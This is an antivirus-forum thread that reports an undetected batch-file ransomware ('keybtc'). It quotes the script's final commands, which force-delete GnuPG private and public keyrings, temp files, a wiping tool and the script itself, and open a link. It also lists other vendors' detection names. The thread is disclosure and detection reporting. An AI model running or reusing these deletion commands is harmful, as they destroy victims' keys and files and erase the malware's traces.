C:\Users\%UserName%\AppData\Roaming>del /f /q "C:\Users\%UserName%\AppData\Roaming\gnupg\*.*"C:\Users\%UserName%\AppData\Roaming>rmdir /s /q "C:\Users\%UserName%\AppData\Roaming\gnupg"C:\Users\%UserName%\AppData\Roaming>del /f /q "C:\Users\%UserName%\AppData\Local\Temp\sdelete.exe"C:\Users\%UserName%\AppData\Roaming>start hxxp://bit.ly/keybtcC:\Users\%UserName%\AppData\Roaming>cd "C:\Users\%UserName%\AppData\Local\Temp"C:\Users\%UserName%\AppData\Local\Temp>del /f /q "C:\Users\%UserName%\AppData\Local\Temp\pubring.bak"C:\Users\%UserName%\AppData\Local\Temp>del /f /q "C:\Users\%UserName%\AppData\Local\Temp\ltr*.html"C:\Users\%UserName%\AppData\Local\Temp>del /f /q "C:\Users\%UserName%\AppData\Local\Temp\pubring.gpg"C:\Users\%UserName%\AppData\Local\Temp>del /f /q "C:\Users\%UserName%\AppData\Local\Temp\secring.gpg"C:\Users\%UserName%\AppData\Local\Temp>del /f /q "C:\Users\%UserName%\AppData\Local\Temp\trustdb.gpg"C:\Users\%UserName%\AppData\Local\Temp>del /f /q "C:\Users\%UserName%\AppData\Local\Temp\random_seed"C:\Users\%UserName%\AppData\Local\Temp>del /f /q "C:\Users\%UserName%\AppData\Local\Temp\crypta.bin"C:\Users\%UserName%\AppData\Local\Temp>del /f /q "C:\Users\%UserName%\AppData\Local\Temp\*.lock"C:\Users\%UserName%\AppData\Local\Temp>del /f /q "C:\Users\%UserName%\AppData\Local\Temp\*.btc"C:\Users\%UserName%\AppData\Local\Temp>del /f /q "C:\Users\%UserName%\AppData\Local\Temp\*.html"C:\Users\%UserName%\AppData\Local\Temp>del /f /q keybtc.cmd 

Remark: start hxxp://bit.ly/keybtc - hxxp://en.wikipedia.org/wiki/RSA_(cryptosystem)#Key_generation Why it opens this Wikipedia page?

 

information above @Malwarehunter (malwaretips.com)

 

Can you explain why after 3 days i sent file

keybtc.btc are still undetected?

 

https://www.virustotal.com/it/file/37c73b3d6ba7d96cbf387f4436f6a2262af14b84f9c0a218fde1b28db5edd23f/analysis/

 

AVG Generic11_c.QPE 20140808

Avast Other:Malware-gen [Trj] 20140807

DrWeb BAT.Encoder.23 20140808

Emsisoft Trojan-Ransom.BAT.Agent (A) 20140808

GData Script.Trojan-Ransom.Scatter.A 20140808

Kaspersky Trojan-Ransom.BAT.Scatter.s 20140808

Microsoft Ransom:BAT/Xibow.A 20140808

Symantec Trojan Horse 20140808

Tencent Bat.Trojan.Scatter.Lnes 20140808

ESET=??????

All file sent to you i give you source link to download

 

When ESET Malware Response Team add detection?

Why ESET Malware Response Team don't block dowload of *.btc files and only block *.zip file from collapseit.com?

Why from 3 days ESET Malware Response Team haven't answer to my mail?

 

Thanks

Edited August 8, 2014 by JAMEWT

[JAMEWT 4]

update

 

now Eset block all download files from collapseit.com (GOOD WORK ESET)

 

keybtc.btc are still undetected

[Marcos 5,072]

To keep the discussion at one place, we'll draw this topic to a close. Please continue here: https://forum.eset.com/topic/3001-new-cryptolocker-variant/